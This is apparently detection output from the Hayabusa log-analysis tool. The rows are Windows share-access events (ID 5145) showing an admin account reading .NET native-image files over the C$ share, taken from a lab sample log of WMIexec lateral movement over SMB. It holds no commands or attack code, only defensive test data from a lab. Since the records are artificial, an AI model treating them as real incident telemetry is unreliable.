+2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
